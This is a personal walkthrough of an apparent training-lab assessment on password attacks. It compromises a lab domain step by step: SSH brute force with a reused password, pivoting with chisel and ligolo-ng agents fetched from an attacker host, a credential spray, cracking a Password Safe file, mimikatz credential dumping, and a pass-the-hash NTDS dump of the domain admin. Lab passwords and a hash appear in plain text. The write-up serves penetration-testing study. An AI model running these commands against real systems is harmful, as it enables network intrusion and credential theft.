This is the Skills Assessment for the Password Attacks Module. I figured it'd be a great part to document as it contains an initial user and four boxes as part of the network. A DMZ01 box, and 3 internal only boxes that require using DMZ01 as a jumpbox.

Starting Information

Host IP Address
DMZ01 10.129.234.116 (External), 172.16.119.13 (Internal)
JUMP01 172.16.119.7
FILE01 172.16.119.10
DC01 172.16.119.11

Additionally, we have the name Betty Jayde who works at Nexura LLC and is known for re-using the password Texas123!@# on multiple sites. It's likely it's being re-used for work. The goal is to priv-esc up to the domain admin account on DC01.

DMZ01

An initial nmap scan reveals only port 22/tcp for OpenSSH 8.2p1 Ubuntu. We have a full name but are unsure of the username format that is in use. Username Anarchy is a good way to generate a wordlist for this.

# generate username list for various formats
$ /opt/username-anarchy/username-anarchy betty jayde > usernames.txt

# brute force the list against the target
$ hydra -L usernames.txt -p 'Texas123!@#' 10.129.234.116 ssh 

It reveals the format is lfirst so jbetty in our case. Will be useful for discovering any additional usernames.

Password reuse is confirmed and we gain ssh access on DMZ01. There's no realm or kerberos configuration. winbind is a running process. In our .bash_history file, there is a sshpass -p "dealer-screwed-gym1" ssh hwilliam@file01.

My thoughts are to immediately make this a jumpbox for further enumeration.

# on attackbox, in tab 1
kali@kali$ sudo nano /etc/proxychains4.conf
socks5 127.0.0.1 1080
kali@kali$ chisel server --reverse --socks5
# on attackbox, in tab 2
kali@kali$ cd /usr/bin
kali@kali$ python -m http.server
# in victim ssh
jbetty@DMZ01$ wget http://10.10.10.10:8000/chisel
jbetty@DMZ01$ chmod +x chisel
jbetty@DMZ01$ ./chisel client 10.10.10.10:8080 R:socks

Unfortunately, it throws an error about missing libc. I saw a similar post online with recommendations for 1.7 or 1.5. I pulled down v1.5.2 from GitHub onto my attackbox and used the same version on the victim and both finally connected!

I tried several variations of the following:

$ proxychains nmap -sT 172.16.119.7 172.16.119.10 172.16.119.11

but everything returns filtered and doesn't seem to work. An alternative appears to be ligolo-ng that is more hands on during setup, but doesn't require configuring SOCKS5 proxies and essentially maps the target network like a VPN tunnel.

# install (if not already)
kali@kali$ sudo apt install ligolo-ng
# start proxy server
kali@kali$ sudo ligolo-proxy -selfcert 
# in the tool, create an interface
ligolo-ng » interface_create --name "ligolo"

# on the victim machine, copy the ligolo-agent file over to victim via any method
# I had to pull a slightly older v0.8.2 from github as this box didn't have the latest version of GLIBC
# https://github.com/nicocha30/ligolo-ng/releases#release-v0.8.2
jbetty@DMZ01$ wget http://10.10.10.10:8000/ligolo-agent
jbetty@DMZ01$ chmod +x ligolo-agent
jbetty@DMZ01$ ./agent -connect 10.10.17.198:11601 --ignore-cert

# back on the attackbox run session and hit enter to select
ligolo-ng » session
? Specify a session : 1 -jbetty@DMZ01 ...
# route the agent traffic to the ligolo interface, use arrows to select it
[Agent : jbetty@DMZ01] » autoroute

# in a new tab on the attackbox, run standard commands against the target IPs
$ nmap -sTV --top-ports=2000 -oA internal_nmap 172.16.119.7 172.16.119.10 172.16.119.11

Finally! After quite a bit of troubleshooting and even some connection drops, we get a response. All 3 of these boxes are Windows, which are to be expected. Now we can go back to the SSH creds we found and attempt them on FILE01

FILE01

# list shares
$ nxc smb 172.16.119.10 -u 'hwilliam'  -p 'dealer-screwed-gym1' --shares

We get a list of shares HR, PRIVATE, TRANSFER where we have R/W perms. There's also IT and MANAGEMENT which we do not appear to have perms. nxc also reveals the domain of nexura.htb.

$ smbclient -U 'hwilliam' --password='dealer-screwed-gym1' -W 'NEXURA.HTB' \\\\172.16.119.10\\HR

With smbclient we can connect to one of the shares. I found I needed to specify the domain and use --password and not -P for the connection to work. Inside HR, under Archive, there are Employee Roster and Employee-Passwords_OLD files.

After pulling the .psafe3 file, we can use hashcat to attempt to recover the password.

$ hashcat -m 5200 Employee-Passwords_OLD.psafe3 /usr/share/wordlists/rockyou.txt

Here, we get a match on michaeljackson. Using sudo apt install passwordsafe, we can install the tool and then pwsafe to open it. There are 2 other users, bdavid:caramel-cigars-reply1 and stom:fails-nibble-disturb4.

The other Employee named files appear to be garbage and don't actually have interesting info.

I threw the IPs into a file and we can see if any of the creds are still valid.

$ cat hosts                                                 
172.16.119.7
172.16.119.10
172.16.119.11
$ nxc winrm hosts -u bdavid -p 'caramel-cigars-reply1'
$ nxc winrm hosts -u stom -p 'fails-nibble-disturb4'
$ nxc rdp hosts -u bdavid -p 'caramel-cigars-reply1'

bdavid does work against JUMP01 under winrm and rdp protocols.

JUMP01

$ xfreerdp /v:172.16.119.7 /u:bdavid /p:caramel-cigars-reply1

We are able to laterally move to JUMP01 with the credentials and get a GUI with xfreerdp

On the attackbox, I did the following to open a GUI window where mimikatz.exe was

$ windows-resources
$ cd ..
$ cd /mimikatz
$ thunar .

We can simply copy paste the binary into the GUI. We are also able to spawn a Powershell.exe as Admin then spawn .\mimikatz.exe

> .\mimikatz.exe
mimikatz> privilege::debug
mimikatz> sekurlsa::logonpasswords

We find the ntlm for stom, 21ea958524cfd9a7791737f8d2f764fa. It also shows the kerberos password of calves-warp-learning1.

Back on our attackbox, we can perform another spray but with stom

$ nxc winrm hosts -u stom -H 21ea958524cfd9a7791737f8d2f764fa
$ nxc rdp hosts -u stom -H 21ea958524cfd9a7791737f8d2f764fa

It returns that stom has admin to all 3 servers. We can use the smb module to dump the hash!

$ nxc smb 172.16.119.11 -u stom -H 21ea958524cfd9a7791737f8d2f764fa --ntds --user Administrator

Conclusion

This was a great final assessment of this very lengthy module of the academy! Some of the beginning with hashcat and john I had done before, but the AD attacks were new and helpful. It was nice learning a tool to pivot between multiple machines in the final assessment. I had used chisel before but not ligolo.